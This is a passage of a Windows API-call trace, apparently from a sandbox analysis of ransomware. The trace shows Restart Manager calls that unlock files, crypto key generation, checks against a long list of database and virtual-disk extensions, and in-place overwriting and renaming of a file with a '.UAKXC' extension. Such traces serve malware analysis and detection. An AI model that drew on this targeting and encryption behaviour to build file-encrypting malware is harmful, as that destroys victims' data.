HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.338] GetLastError () returned 0x20 [0144.338] RmStartSession () returned 0x0 [0144.342] RmRegisterResources () returned 0x0 [0144.345] RmGetList () returned 0xea [0144.557] GetProcessHeap () returned 0xea0000 [0144.557] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29c) returned 0xef5140 [0144.557] RmGetList () returned 0x0 [0144.648] GetCurrentProcess () returned 0xffffffff [0144.648] GetProcessId (Process=0xffffffff) returned 0xaec [0144.649] RmShutdown () returned 0x15e [0144.738] GetProcessHeap () returned 0xea0000 [0144.738] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5140 | out: hHeap=0xea0000) returned 1 [0144.738] RmEndSession () returned 0x0 [0144.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef0ad8 | out: hHeap=0xea0000) returned 1 [0144.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b78 | out: hHeap=0xea0000) returned 1 [0144.741] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0144.741] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0144.741] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0144.741] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1")) returned 0x22 [0145.998] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0145.998] GetLastError () returned 0x0 [0145.998] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=189440) returned 1 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".4dd") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".4dl") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accdb") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accdc") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accde") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accdr") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accdt") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accft") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".adb") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ade") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".adf") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".adp") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".arc") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ora") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".alf") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ask") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".btr") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".bdf") returned 0x0 [0145.999] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".cat") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".cdb") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ckp") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".cma") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".cpd") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dacpac") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dad") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dadiagrams") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".daschema") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".db") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".db-shm") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".db-wal") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".db3") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dbc") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dbf") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dbs") returned 0x0 [0146.000] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dbt") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dbv") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dbx") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dcb") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dct") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dcx") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ddl") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dlis") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dp1") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dqy") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dsk") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dsn") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dtsx") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".dxl") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".eco") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ecx") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".edb") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".epim") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".exb") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fcd") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fdb") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fic") returned 0x0 [0146.001] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fmp") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fmp12") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fmpsl") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fol") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fp3") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fp4") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fp5") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fp7") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fpt") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".frm") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".gdb") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".grdb") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".gwi") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".hdb") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".his") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ib") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".idb") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ihx") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".itdb") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".itw") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".jet") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".jtx") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".kdb") returned 0x0 [0146.002] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".kexi") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".kexic") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".kexis") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".lgc") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".lwx") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".maf") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".maq") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mar") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mas") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mav") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mdb") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mdf") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mpd") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mrg") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mud") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mwb") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".myd") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ndf") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nnt") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nrmlib") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ns2") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ns3") returned 0x0 [0146.003] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".ns4") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nsf") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nv") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nv2") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nwdb") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nyf") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".odb") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".oqy") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".orx") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".owc") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".p96") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".p97") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".pan") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".pdb") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".pdm") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".pnz") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".qry") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".qvd") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".rbf") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".rctd") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".rod") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".rodx") returned 0x0 [0146.004] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".rpd") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".rsd") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sas7bdat") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sbf") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".scx") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sdb") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sdc") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sdf") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sis") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".spq") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sql") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sqlite") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sqlite3") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".sqlitedb") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".te") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".temx") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".tmd") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".tps") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".trc") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".trm") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".udb") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".udl") returned 0x0 [0146.005] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".usr") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".v12") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vis") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vpd") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vvv") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".wdb") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".wmdb") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".wrk") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".xdb") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".xld") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".xmlff") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".abcddb") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".abs") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".abx") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".accdw") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".adn") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".db2") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".fm5") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".hjt") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".icg") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".icr") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".kdb") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".lut") returned 0x0 [0146.006] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".maw") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mdn") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".mdt") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vdi") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vhd") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmdk") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".pvm") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmem") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmsn") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmsd") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".nvram") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmx") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".raw") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".qcow2") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".subvol") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".bin") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vsv") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".avhd") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmrs") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vhdx") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".avdx") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".vmcx") returned 0x0 [0146.007] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpSrch=".iso") returned 0x0 [0146.008] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.008] WriteFile (in: hFile=0x6ec, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0146.955] WriteFile (in: hFile=0x6ec, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0146.955] SetEndOfFile (hFile=0x6ec) returned 1 [0146.955] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.955] ReadFile (in: hFile=0x6ec, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x2e400, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x2e400, lpOverlapped=0x0) returned 1 [0147.596] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfffd1c00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.596] WriteFile (in: hFile=0x6ec, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x2e400, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x2e400, lpOverlapped=0x0) returned 1 [0147.597] CloseHandle (hObject=0x6ec) returned 1 [0147.600] GetProcessHeap () returned 0xea0000 [0147.600] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0147.600] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\Users\\Default\\NTUSER.DAT.LOG1" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned="C:\\Users\\Default\\NTUSER.DAT.LOG1" [0147.601] lstrcatW (in: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1.UAKXC") returned="C:\\Users\\Default\\NTUSER.DAT.LOG1.UAKXC" [0147.601] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.UAKXC" (normalized: "c:\\users\\default\\ntuser.dat.log1.uakxc")) returned 1 